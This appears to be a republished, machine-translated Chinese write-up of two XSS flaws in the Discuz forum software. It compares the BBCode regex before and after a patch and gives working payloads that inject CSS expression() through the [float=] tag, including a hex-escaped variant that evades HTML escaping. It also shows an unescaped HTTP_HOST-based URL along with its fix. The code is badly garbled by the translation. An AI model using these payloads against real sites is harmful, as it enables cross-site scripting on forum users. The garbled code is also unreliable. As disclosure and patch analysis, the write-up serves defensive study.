One XSS supplemented by dz0724 patch + another XSS supplemented

Source: Internet
Author: User
Tags bbcode
Compared with patches, we found in \ include \ discuzcode. func. php:

$ Discuzcodes ['searcharray'] ['bbcode _ Regexp '] = array (// The regular expression of the tag
 
"/\ [Align = ([^ \ [\ <] + ?) \]/I ", ----> before Patching
"/\ [Float = ([^ \ [\ <] + ?) \]/I"
|
V
"/\ [Align = (left | center | right) \]/I", ----> after patching
"/\ [Float = (left | right) \]/I"

Continue to see that the following codz is used to process the two tags:

$ Discuzcodes ['replace earray'] ['bbcode _ Regexp '] = array (// Replace the Regular Expression

........
"<P align = \" \ 1 \ "> ",
"<Br style = \" clear: Both \ "> <span style = \" float: \ 1; \ ">"

Replaced code:

$ Message = str_replace ($ discuzcodes ['searcharray'] ['bbcode _ str'],
$ Discuzcodes ['replace earray'] ['bbcode _ str'],
Preg_replace (
($ Parsetype! = 1 & $ allowbbcode = 2 & $ globals ['_ dcache'] ['bbcode']? Array_merge ($ discuzcodes ['searcharray'] ['bbcode _ Regexp '], $ globals [' _ dcache '] ['bbcodes'] ['searcharray']): $ discuzcodes ['searcharray'] ['bbcode _ Regexp ']),
($ Parsetype! = 1 & $ allowbbcode = 2 & $ globals ['_ dcache'] ['bbcode']? Array_merge ($ discuzcodes ['replace earray'] ['bbcode _ Regexp '], $ globals [' _ dcache '] ['bbcode'] ['replace earray']): $ discuzcodes ['replace earray'] ['bbcode _ Regexp ']),
$ Message ));

After testing, it is found that $ message has been processed by htmlspecialchars or similar functions before it enters str_replace. So there is no way to use "and <>
This means "/\ [align = ([^ \ [\ <] + ?) \]/I "-->" <p align = \ "\ 1 \"> "cannot be used" <>. Let's look at the float label again:

"/\ [Float = ([^ \ [\ <] + ?) \]/I "-->" <br style = \ "clear: Both \"> <span style = \ "float: \ 1; \">"

After replacement, \ 1 enters <span style =. Using expression () in Haha style = does not require "close and :).

Test codz:

[Float = expression (Alert (123456789)] test [/float]

The above is just a basket. In view of the fact that many ox and ox have BS, there are indeed some situations where the basket cannot be used, because alert (123456789) this contains no special sensitive symbols. Let's take a look at "/\ [float = ([^ \ [\ <] + ?) \]/I "the extracted regular expression does not have any special filtering, but $ message is htmlchars before it is replaced.
Therefore, it is completely usable, such:

[Float = \ 65 \ 78 \ 70 \ 72 \ 65 \ 73 \ 73 \ 69 \ 6f \ 6e \ 28 \ 61 \ 6C \ 65 \ 72 \ 74 \ 28 \ 31 \ 32 \ 33 \ 34 \ 35 \ 36 \ 37 \ 38 \ 39 \ 29 \ 29] test [/float]

But I still play the basket :).

Afterwards: some code in the discuzcode of DZ is really poorly written [I mean code style]. I guess the person in charge of code security of DZ is also depressed, is the vulnerability invisible? Pure yy ...... However, the black box test on XSS is more convenient than the code. [some people will be very happy to see this.]

Another XSS supplemented by dz0724 patch

\ Include \ common. Inc. php:

$ Boardurl = 'HTTP: // '. $ _ server ['HTTP _ host']. preg_replace ("// \/+ (API | archiver | WAP )? \/* $/I ",'', substr ($ php_self, 0, strrpos ($ php_self ,'/'))).'/';

$ Boardurl = htmlspecialchars ('HTTP: // '. $ _ server ['HTTP _ host']. preg_replace ("// \/+ (API | archiver | WAP )? \/* $/I ",'', substr ($ php_self, 0, strrpos ($ php_self ,'/'))).'/');

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.